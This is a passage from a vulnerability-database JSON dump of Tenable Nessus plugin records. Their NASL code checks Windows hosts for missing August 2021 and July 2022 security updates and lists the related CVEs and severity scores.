"CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005033.NASL", "href": "https://www.tenable.com/plugins/nessus/152431", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152431);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26431\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005033\");\n script_xref(name:\"MSFT\", value:\"MS21-5005033\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431,\n CVE-2021-34483, CVE-2021-34484, CVE-2021-34486,\n CVE-2021-34487, CVE-2021-34536, CVE-2021-34537,\n CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005033-os-builds-19041-1165-19042-1165-and-19043-1165-b4c77d08-435a-4833-b9f7-e092372079a4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?526975a8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005033.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-08';\nvar kbs = make_list(\n '5005033'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19041,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19042,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19043,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005030.NASL", "href": "https://www.tenable.com/plugins/nessus/152435", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152435);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005030\");\n script_xref(name:\"MSFT\", value:\"MS21-5005030\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005030-os-build-17763-2114-cec503ed-cc09-4641-bdc1-988153e0bd9a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34b43ea5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005030'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:17763,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005030])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:01:41", "description": "The remote Windows host is missing security update 5015870 or cumulative update 5015866. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226). \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015870: Windows Server 2008 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22043", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015870.NASL", "href": "https://www.tenable.com/plugins/nessus/163051", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163051);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22034\",\n \"CVE-2022-22037\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22043\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015866\");\n script_xref(name:\"MSKB\", value:\"5015870\");\n script_xref(name:\"MSFT\", value:\"MS22-5015866\");\n script_xref(name:\"MSFT\", value:\"MS22-5015870\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015870: Windows Server 2008 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015870 or \ncumulative update 5015866. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226). \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015866\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015870\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015866\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015870\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015870 or Cumulative Update 5015866\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22037\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015870',\n '5015866'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015870, 5015866])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T10:27:45", "description": "The remote Windows host is missing security update 5015875 or cumulative update 5015863. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015875: Windows Server 2012 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015875.NASL", "href": "https://www.tenable.com/plugins/nessus/163043", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163043);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015863\");\n script_xref(name:\"MSKB\", value:\"5015875\");\n script_xref(name:\"MSFT\", value:\"MS22-5015863\");\n script_xref(name:\"MSFT\", value:\"MS22-5015875\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015875: Windows Server 2012 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015875 or \ncumulative update 5015863. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226)\n\nNote that 